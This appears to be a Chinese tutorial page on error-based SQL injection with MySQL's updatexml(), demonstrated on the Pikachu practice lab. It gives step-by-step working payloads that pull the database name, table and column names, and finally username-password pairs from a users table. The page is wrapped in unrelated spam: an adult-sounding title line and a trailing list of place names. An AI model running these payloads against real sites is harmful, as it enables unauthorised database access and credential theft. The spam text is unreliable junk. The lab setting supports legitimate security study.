91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SQL報錯盲注實例分析

發布時間:2022-07-22 16:30:35 來源:億速云 閱讀:131 作者:iii 欄目:開發技術

本篇內容主要講解“SQL報錯盲注實例分析”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“SQL報錯盲注實例分析”吧!

一、SQL報錯函數詳解

updatexml();floor();extractvalue();等函數都可以用于構造SQL報錯函數,今天我們主要來講解使用updatexml()函數。
updatexml()函數使用格式如下:

updatexml(XML_document,XPath_string,new_value)

XML_document是String格式的XML文檔名稱,XPath_string是XPath格式的字符串,new_value是String格式的而字符串,用于替換查找到的符合條件的數據。
該函數有一個特性,即如果XPath_string不是XPath格式的字符串,就會報錯并顯示處XPath的值,因此,我們可以利用這一特性實現SQL報錯盲注。此外,我們還可以利用updatexml()函數的特性,實現在SQL插入、刪除等語句中的SQL注入。

二、SQL報錯盲注payload構造

1、updatexml語句構造思路

updatexml()函數的構造,首先需要閉合SQL語句中的冒號、括號。其次還需要使用and或者or語句連接成一個單獨的語句,這樣即可成功執行updatexml()函數中的語句。
下面,我以皮卡丘靶場為例,來簡單介紹一下updatexml報錯注入payload的構造思路,皮卡丘靶場SQL insert/update型注入頁面如下所示:

SQL報錯盲注實例分析

從上圖中可以看出,該頁面功能上是提供人員的注冊,因此可以猜測其內部是insert類型的SQL語句,因此我們可以在手機、住址等列(一般不要選擇密碼,因為很多網站都會把密碼進行md5處理,從而導致我們的updatexml失效)中插入我們的updatexml語句。通過簡單的實驗可以得知,該站點的注入閉合為單引號,因此payload的構造格式為:

12' or updatexml() or'

2、查詢當前數據庫

當我們確定updatexml()函數的格式后,我們就可以寫實際的payload語句了,相關命令如下所示:

12'or updatexml(1,concat(0x7e,database(),0x7e),0) or'

從上payload可以看出,updatexml()函數有三部分組成,我們需要把我們要執行的SQL語句寫到第二部分,第二部分是一個concat()函數,之所以要拼接0x7e是因為該16進制字符是一個波浪線,也可以換成其他的字符。
該payload執行結果如下所示:

SQL報錯盲注實例分析

從上圖可以看出,我們當前的數據庫名為pikachu。

3、查詢表名

查詢表名的payload如下所示:

12' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),0) or '

在上述payload中,concat中間的SQL語句要用括號括起來,然后寫入正常的查詢命令即可,該payload執行結果如下所示:

SQL報錯盲注實例分析

從上圖可以看出,我們查詢到當前數據庫存在一個名為httpinfo的表,如果我們更改limit的限制,那么我們可以得到更多的表。

4、查詢列名

查詢列名的payload如下所示:

12' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),0) or '

該payload構造原理與以上類似,執行結果如下所示:

SQL報錯盲注實例分析

5、查詢字段名

字段名查詢的payload如下所示:

12' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='pikachu'),0x7e),0) or '

該payload構造原理與以上類似,執行結果如下所示:

SQL報錯盲注實例分析

6、查詢數據

數據查詢的payload如下所示:

12' or updatexml(1,concat(0x7e,(select concat(username,'-',password) from users limit 0,1),0x7e),0) or '

該payload構造原理與以上類似,執行結果如下所示:

SQL報錯盲注實例分析

到此,相信大家對“SQL報錯盲注實例分析”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

sql
AI

定陶县| 西安市| 恩平市| 阿勒泰市| 攀枝花市| 宁陵县| 南开区| 吴川市| 乌拉特中旗| 石台县| 荔波县| 丽水市| 菏泽市| 韶山市| 思茅市| 子洲县| 遵化市| 游戏| 海兴县| 金山区| 桦南县| 筠连县| 毕节市| 宁远县| 玉林市| 长乐市| 西宁市| 昌宁县| 宁波市| 礼泉县| 泰来县| 金川县| 镇赉县| 英超| 郴州市| 东乌| 东乡县| 南丹县| 呼伦贝尔市| 贵港市| 梁河县|